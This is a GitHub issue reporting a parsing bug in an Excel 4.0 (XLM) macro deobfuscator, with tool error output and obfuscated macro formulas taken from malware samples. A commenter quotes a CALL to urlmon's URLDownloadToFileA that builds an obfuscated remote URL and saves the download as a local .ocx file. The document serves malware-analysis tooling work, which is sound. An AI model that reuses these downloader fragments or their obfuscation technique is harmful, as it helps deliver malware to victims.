Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Error: Unexpected token Token('__ANON_0', ':"&"//")&"su")&"bb")& ...') #111

Open
cccs-jh opened this issue Jun 22, 2022 · 1 comment
Open

Error: Unexpected token Token('__ANON_0', ':"&"//")&"su")&"bb")& ...') #111

cccs-jh opened this issue Jun 22, 2022 · 1 comment
Assignees
@DissectMalware
Labels
bug Something isn't working

Comments

@cccs-jh
Copy link
Contributor

cccs-jh commented Jun 22, 2022

Running xlmdeobfuscator on this file:
https://www.virustotal.com/gui/file/a0de1f3af78bef68ddfcabf4b7cedfa0e466ac65648a5e81e591702b463c96b1
gives the following error:

Unencrypted xls file

[Loading Cells]
auto_open: auto_open->'KBRSBTL'!$J$1
[Starting Deobfuscation]
CELL:J12 , FullEvaluation , "False"
Error [deobfuscator.py:2586 parse_tree = self.xlm_parser.parse(formula)]: Unexpected token Token('__ANON_0', ':"&"//")&"su")&"bb")&"al")&"ak")&"sh")&"mi.c")&"o")&"m/d")&"a",25352.0)=TEXT(((((("t"&"a_w")&"in")&"ni")&"ng/k")&"Yv6")&"xb/",3646.0)","..\peg1.ocx",0,0)') at line 1, column 69.
Expected one of:
* MULTIOP
* ADDITIVEOP
* CMPOP
* LIST_SEPARATOR
* L_PRA
* R_PRA
* CONCATOP
Previous tokens: [Token('STRING', '"http=TEXT(((((((((("')]

The raw XLM macro, as extracted by olevba, is:

' RAW EXCEL4/XLM MACRO FORMULAS:
' SHEET: KBRSBTL, Macrosheet
' CELL:J12, =(((((((FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!G24)&'THJD'!D15)&'SGGSBe'!D8)&'THJD'!R19,J15)=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!D8)&'KBSNTND'!F24)&'KBSNTND'!L31,J17))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!H26)&'THJD'!D15)&'SGGSBe'!H13)&'THJD'!R19,J19))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!H13)&'KBSNTND'!F24)&'KBSNTND'!L31,J21))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!I24)&'THJD'!D15)&'SGGSBe'!M3)&'THJD'!R19,J23))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!M3)&'KBSNTND'!F24)&'KBSNTND'!L31,J25))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!J26)&'THJD'!D15)&'SGGSBe'!R17)&'THJD'!R19,J27))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!R17)&'KBSNTND'!F24)&'KBSNTND'!L31,J29))=FORMULA((('KBSNTND'!L24&'KBSNTND'!G44)&'KBSNTND'!H46)&'KBSNTND'!J44,J49), 1
@kirk-sayre-work
Copy link

https://www.virustotal.com/gui/file/756186368250a9902ae168c2f0c6a77d3fdd70f7a5589c36f8c7bd80cf8756e4 is another sample with this problem. I've looked a bit into this issue and it looks like there are 2 problems with analyzing the sample:

  1. Things like '=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http=TEXT(((((((((("s"&":/")&"/m-a")&"in")&"su")&"ra")&"nc")&"e.c")&"o")&"m/w")&"p-a",25352.0)=TEXT((((((((("d"&"m")&"i")&"n/OR")&"iP")&"BS")&"tK")&"NO")&"nI")&"V/",3646.0)","..\udh1.ocx",0,0)' are not parsing because the double quotes in the TEXT() expressions in the "http=..." string are not escaped as '""', so the string is invalid.
  2. The next problem (I wrote a hacky patch in my local XLMMacroDeobfuscator to get past the 1st problem) is that the TEXT() expressions that appear inside the "http=..." string are not emulated, they just remain as-is in the string. I'm not familiar enough with XLM macros to know whether XLM formula calls are supposed to be resolved inside string literals or not, but it looks like maybe they do get resolved?

@DissectMalware DissectMalware self-assigned this Jun 29, 2022
@DissectMalware DissectMalware added the bug Something isn't working label Jun 29, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@DissectMalware DissectMalware

Labels
bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@DissectMalware @kirk-sayre-work @cccs-jh